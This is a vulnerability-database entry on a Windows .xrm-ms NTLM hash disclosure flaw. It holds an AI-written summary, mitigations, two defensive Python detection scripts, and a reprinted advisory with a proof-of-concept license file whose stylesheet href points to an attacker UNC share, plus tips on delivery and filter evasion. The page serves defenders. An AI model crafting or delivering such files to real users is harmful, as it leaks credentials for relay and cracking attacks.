Microsoft Windows - XRM-MS File NTLM Information Disclosure Spoofing
AI Analysis
Technical Summary
The Microsoft Windows XRM-MS File NTLM Information Disclosure Spoofing vulnerability involves the handling of .xrm-ms files, which are digital license files associated with Microsoft's software licensing infrastructure. These files are registered to open by default in Internet Explorer on older systems and Microsoft Edge on newer Windows versions (Windows 7, 10, 11, and Server 2019). The vulnerability arises because the .xrm-ms file format supports embedding XML stylesheets via the xml-stylesheet processing instruction. An attacker can craft a malicious .xrm-ms file that references a remote UNC (Universal Naming Convention) path in the stylesheet's href attribute. When a user opens this file, the system attempts to load the stylesheet from the specified UNC path, triggering an outbound SMB (Server Message Block) connection to the attacker-controlled server or network share. This connection causes the Windows client to send its NTLM (NT LAN Manager) authentication hash to the attacker. The NTLM hash can be captured and potentially used in relay or offline cracking attacks to impersonate the user or escalate privileges. This attack requires user interaction to open the malicious .xrm-ms file, which can be delivered through various vectors such as email attachments, drive-by downloads, network shares, or compressed archives. Notably, the .xrm-ms file type is not commonly flagged as dangerous by email gateways or Microsoft Outlook 2016, and it bypasses several security controls including Mark of the Web (MOTW) warnings and active content security prompts. The default icon and association with Microsoft software may increase user trust and likelihood of opening the file. The exploit has been tested successfully on Windows 7, Windows 10, and Server 2019, with uncertain behavior on Windows 11 or recently updated systems. 
Microsoft’s security response classified the issue as a moderate spoofing vulnerability and declined to issue a patch, citing it does not meet their security bar. The exploit code is publicly available and written in Perl, demonstrating how to craft the malicious .xrm-ms file and trigger the NTLM hash leak. This disclosure enables attackers to leverage this information disclosure vector for reconnaissance or as a stepping stone in more complex attacks involving NTLM relay or credential theft.
Potential Impact
For European organizations, this vulnerability poses a significant risk of credential leakage, particularly in environments where Windows systems are prevalent and users may receive files from external or untrusted sources. The disclosure of NTLM hashes can facilitate lateral movement within corporate networks, privilege escalation, and unauthorized access to sensitive systems. Since the attack requires user interaction, phishing campaigns or social engineering could be used to deliver the malicious .xrm-ms files. The ability to bypass common email security filters and the lack of active content warnings increase the likelihood of successful exploitation. Organizations relying on legacy Windows versions or with insufficient endpoint protection are especially vulnerable. The impact extends to confidentiality (exposure of authentication hashes), integrity (potential unauthorized access), and availability (if attackers leverage the hashes to disrupt services). Given the widespread use of Windows in European enterprises, this vulnerability could be exploited against critical infrastructure, government agencies, and private sector companies, potentially leading to data breaches and operational disruptions.
Mitigation Recommendations
1. Implement strict email filtering rules to block or quarantine .xrm-ms files and other uncommon file types that are not essential for business operations.
2. Educate users about the risks of opening unexpected or suspicious files, especially those with uncommon extensions like .xrm-ms.
3. Disable or restrict the automatic opening of .xrm-ms files by changing file associations or using application whitelisting to prevent execution.
4. Employ network-level controls to monitor and block outbound SMB connections to untrusted or external IP addresses, mitigating NTLM hash leakage.
5. Deploy endpoint detection and response (EDR) solutions capable of detecting anomalous SMB traffic and credential theft behaviors.
6. Enforce the use of NTLMv2 with strong encryption and consider disabling NTLM authentication where feasible, migrating to Kerberos.
7. Regularly update and patch Windows systems, and monitor Microsoft advisories for any future updates related to this vulnerability.
8. Use multi-factor authentication (MFA) to reduce the risk posed by compromised NTLM hashes.
9. Review and tighten group policies related to network authentication and SMB signing to increase security against relay attacks.
10. Conduct phishing simulations and security awareness training focusing on file-based attacks and social engineering tactics.
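Recommendations 4 and 5 come down to one detection: a workstation process, and in this case specifically the browser that handles .xrm-ms files, opening an SMB connection to an address outside the internal network. The script below is an added example, not code from the advisory or from this page. It assumes connection telemetry in a constructed, simplified CSV layout (timestamp,host,image,dst_ip,dst_port); real sources such as Sysmon Event ID 3 or firewall logs would need their own parser, and the sample rows and the 203.0.113.x / 198.51.100.x destinations are constructed documentation addresses.

```python
"""Flag outbound SMB connections from workstations to non-internal addresses.

Added example for the network-monitoring recommendations above; not code from
the advisory or from this page. Assumes a constructed, simplified CSV layout.
"""
import csv
import io
import ipaddress
import ntpath
from typing import Dict, List

# Constructed sample telemetry. A browser process reaching an address outside
# the internal ranges on TCP/445 is the pattern the advisory describes: the
# stylesheet href triggers an SMB connection to an attacker-controlled host.
SAMPLE_LOG = """\
timestamp,host,image,dst_ip,dst_port
2025-04-30T10:01:02Z,WS01,C:\\Windows\\explorer.exe,10.0.0.5,445
2025-04-30T10:01:07Z,WS01,C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe,203.0.113.10,445
2025-04-30T10:01:09Z,WS01,C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe,203.0.113.10,443
2025-04-30T10:02:15Z,WS02,C:\\Program Files\\Internet Explorer\\iexplore.exe,198.51.100.7,445
2025-04-30T10:03:00Z,WS02,C:\\Windows\\System32\\svchost.exe,192.168.1.20,445
"""

SMB_PORTS = {445, 139}

# Processes that should never originate SMB traffic to the internet; the
# .xrm-ms handler is Internet Explorer or Edge, so those rate highest.
BROWSER_IMAGES = {"msedge.exe", "iexplore.exe"}

# Explicit internal ranges rather than ipaddress's is_private, which also
# treats the RFC 5737 documentation nets used in this sample as "private".
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]


def is_external(ip: str) -> bool:
    """True when the address falls outside every internal range."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def find_external_smb(log_text: str) -> List[Dict[str, str]]:
    """Return the rows that represent SMB traffic to external hosts,
    each annotated with a severity based on the originating process."""
    alerts = []
    for row in csv.DictReader(io.StringIO(log_text)):
        if int(row["dst_port"]) not in SMB_PORTS:
            continue
        if not is_external(row["dst_ip"]):
            continue
        image = ntpath.basename(row["image"]).lower()
        alert = dict(row)
        alert["severity"] = "high" if image in BROWSER_IMAGES else "medium"
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in find_external_smb(SAMPLE_LOG):
        print(f'{a["timestamp"]} {a["host"]} {a["severity"]}: '
              f'{a["image"]} -> {a["dst_ip"]}:{a["dst_port"]}')
```

Run against the sample, the two browser-originated connections to 203.0.113.10 and 198.51.100.7 on port 445 are reported as high severity; the same browser's port 443 connection and the two internal SMB connections are ignored. The explicit internal-range list matters: Python's `is_private` also classifies the RFC 5737 documentation ranges as private, which would silently hide the sample hits, and in production the list should be replaced with the organization's own address plan.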
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland, Belgium, Sweden, Switzerland
Indicators of Compromise
- exploit-code:
# Exploit Author: John Page (aka hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Source: https://hyp3rlinx.altervista.org/advisories/Microsoft_Windows_xrm-ms_File_NTLM-Hash_Disclosure.txt
# x.com/hyp3rlinx
# ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
.xrm-ms File Type

[Vulnerability Type]
NTLM Hash Disclosure (Spoofing)

[Video URL PoC]
https://www.youtube.com/watch?v=d5U_krLQbNY

[CVE Reference]
N/A

[Security Issue]
The Windows XRM-MS file type is related to Microsoft's software licensing infrastructure.

C:\> assoc .xrm-ms=MSSppLicenseFile

An "xrm-ms" digital license file opens default (times a tickin) in Internet Explorer (MSIE) and on later OS versions switches to MS Edge.

The ".xrm-ms" file format allows injecting XML stylesheets that will then get processed when a user opens it. Adversaries can reference UNC paths for the stylesheet HREF tag that points to a LAN network share or attacker controlled infrastructure. This results in an outbound connection to the attacker controlled network share and or server, leaking the target NTLM hash.

Works from both a LAN network share perspective or remote forced drive-by download to a target etc. User interaction is required to open the file.

During testing, the xrm-ms file type was not blocked by the Windows Office Outlook client 2016 and a popular Email Gateway Security product as of a few days ago.

Xrm-Ms File points:
1) XRM-MS is not considered a dangerous file type
2) Defaults to open in either MSIE or Edge Win7/10/11/Server 2019
3) Default Icon as it is Windows browser may make it appear more "trust-worthy"
4) Throws no errors from the stylesheet directive when processed
5) May bypass some inbound email security inspections
6) No MOTW roadblocks
7) No active content security warnings

Tested successfully in Win7/Win10/Server 2019
Mileage may vary on Windows 11 and or recently updated systems.
[Exploit/POC]
Delivery options:
Drive-by force download
Email
Network Share
Archive .zip etc

1) Create .xrm-ms File with following content, adjust attacker server information.
Actually, all you need is the one XML stylesheet to trigger it.

<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet href="\\ATTACKER-SERVER\NTLMhashLeakDontMeetMSRCBarPoC" ?>
<r:license xmlns:r="http://www.microsoft.com/DRM/rightsManager">
  <r:licenseID>12345-67890-ABCDE</r:licenseID>
  <r:productName>Windows(R) Operating System, VOLUME_KMSCLIENT channel</r:productName>
  <r:productKeyID>XXXXX-XXXXX-XXXXX-XXXXX-XXXXX</r:productKeyID>
  <r:hardwareBinding>
    <r:hash>AA11BB22CC33DD44EE55</r:hash>
  </r:hardwareBinding>
  <r:validity>
    <r:validFrom>2024-01-01T00:00:00</r:validFrom>
    <r:validUntil>2025-01-01T00:00:00</r:validUntil>
  </r:validity>
  <r:signature>...</r:signature>
</r:license>

[Network Access]
Remote

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: April 17, 2025
MSRC response: "report is a moderate spoofing and doesn't meet the bar." April 29, 2025
April 30, 2025 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content copyright (c). hyp3rlinx
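The whole trigger in the advisory is one xml-stylesheet processing instruction whose href is a UNC path, so a gateway or EDR check for this file type reduces to finding that directive and classifying where its href points. The scanner below is an added example, not the advisory's or this page's code. The sample inputs are constructed; 203.0.113.10 is a documentation address standing in for any off-host target, and the scanner also covers two evasions a practitioner would expect, backslashes hidden behind XML character references and a UTF-16 encoded file.

```python
"""Scan .xrm-ms (or any XML) content for xml-stylesheet directives that point
off-host. Added example; not code from the advisory or from this page.
All sample inputs below are constructed for the example."""
import html
import re
from typing import Dict, List

# Any xml-stylesheet processing instruction, wherever it appears in the file;
# the trigger does not have to be in the prolog to be worth flagging.
_PI_RE = re.compile(r"<\?xml-stylesheet\b(.*?)\?>", re.IGNORECASE | re.DOTALL)
# href pseudo-attribute inside the PI body, single or double quoted.
_HREF_RE = re.compile(r"href\s*=\s*([\"'])(.*?)\1", re.IGNORECASE | re.DOTALL)
_SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.IGNORECASE)

REMOTE_SCHEMES = {"http", "https", "ftp", "smb"}


def decode_xml(data: bytes) -> str:
    """Decode honouring a UTF-16 BOM; otherwise UTF-8 with any BOM stripped."""
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16")
    return data.decode("utf-8-sig", errors="replace")


def classify_href(href: str) -> str:
    """Return 'unc', 'remote' or 'local' for a stylesheet href."""
    h = html.unescape(href).strip()  # &#92; and friends become literal chars
    if h.startswith(("\\\\", "//")):
        return "unc"
    m = _SCHEME_RE.match(h)
    if m:
        scheme = m.group(1).lower()
        if scheme == "file":
            # file://host/share is a UNC path in disguise; file:///C:/x is local
            rest = h[len("file:"):]
            if rest.startswith("//") and not rest.startswith("///"):
                return "unc"
            return "local"
        if scheme in REMOTE_SCHEMES:
            return "remote"
    return "local"


def scan_xrm_ms(data: bytes) -> List[Dict[str, str]]:
    """List every stylesheet href in the file with its classification."""
    text = decode_xml(data)
    findings = []
    for pi in _PI_RE.finditer(text):
        m = _HREF_RE.search(pi.group(1))
        if m:
            href = m.group(2)
            findings.append({"href": href, "kind": classify_href(href)})
    return findings


def is_suspicious(data: bytes) -> bool:
    """True when any stylesheet href would leave the local machine."""
    return any(f["kind"] in ("unc", "remote") for f in scan_xrm_ms(data))


# Constructed samples (not the advisory's PoC file).
BENIGN = (b'<?xml version="1.0"?><r:license xmlns:r='
          b'"http://www.microsoft.com/DRM/rightsManager"><r:licenseID>1'
          b'</r:licenseID></r:license>')
UNC = (b'<?xml version="1.0" encoding="utf-8"?>\n'
       b'<?xml-stylesheet href="\\\\203.0.113.10\\share\\x.xsl" ?>\n'
       b'<r:license xmlns:r="http://www.microsoft.com/DRM/rightsManager"/>')
ENCODED = (b'<?xml version="1.0"?><?xml-stylesheet type="text/xsl" '
           b"href='&#92;&#92;203.0.113.10&#92;share&#92;x.xsl'?>"
           b'<r:license xmlns:r="x"/>')
UTF16 = UNC.decode("utf-8").encode("utf-16")  # BOM-prefixed UTF-16 copy
LOCAL = (b'<?xml version="1.0"?><?xml-stylesheet href="license.xsl"?>'
         b'<r:license xmlns:r="x"/>')

if __name__ == "__main__":
    for name, sample in [("BENIGN", BENIGN), ("UNC", UNC),
                         ("ENCODED", ENCODED), ("UTF16", UTF16),
                         ("LOCAL", LOCAL)]:
        print(name, is_suspicious(sample), scan_xrm_ms(sample))
```

Only the UNC, entity-encoded and UTF-16 samples are reported as suspicious; a license with no stylesheet, or one that references a relative local stylesheet, passes. Because the directive is plain XML, the same check is worth running on every XML-based attachment a gateway sees, not only on files that happen to carry the .xrm-ms extension, since recommendation 1 above (blocking by extension) is easily sidestepped by renaming.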
Technical Details
- EDB ID: 52277
- Has Exploit Code: true
- Code Language: perl
Threat ID: 68489e437e6d765d51d54352
Added to database: 6/10/2025, 9:06:11 PM
Last enriched: 6/11/2025, 9:11:10 PM
Last updated: 7/14/2025, 12:43:04 AM